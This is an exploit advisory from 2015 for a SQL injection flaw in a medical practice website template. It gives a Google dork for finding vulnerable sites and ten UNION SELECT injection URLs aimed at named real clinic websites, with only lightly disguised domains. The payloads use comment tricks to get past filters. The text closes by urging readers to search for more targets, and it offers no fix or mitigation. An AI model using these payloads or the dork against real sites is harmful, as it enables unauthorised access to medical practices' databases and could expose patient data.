###################### # Exploit Title : Medical Website Design SQL Injection Vulnerability # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : http://www.medicalpracticewebsitedesign.com/ # Google Dork : "Medical Practice Website Design" inurl:.php?newsid= # Date: 2015-07-24 # Tested On : Win 7 / Mozilla Firefox # ###################### # # demos and explanations : # # http://www.georgXiavascularclinic.com/news-topic.php?newsid=-25%20%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7-- # http://www.arundXelpediatrics.net/news-topic.php?newsid=-28%20%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7-- # http://www.monXtgomerywomenshealth.com/news-topic.php?newsid=-25%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7-- # http://www.ovieXdointernalmedicine.com/news-topic.php?newsid=-29%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7-- # http://personalizXedcardiology.com/news-topic.php?newsid=-27%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7-- # http://www.norXthatlantaprimarycare.com/news-topic.php?newsid=-84%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6-- # http://www.medXassocga.com/news-topic.php?newsid=-31%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7-- # http://www.sd-Xneurosurgeon.com/news-topic.php?newsid=-16%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6-- # http://www.sspXinst.us/news-topic.php?newsid=-25%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7-- # http://www.nmmeXdicalgroup.com/news-topic.php?newsid=-13%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6-- # # and google more # ###################### # discovered by : Naji ######################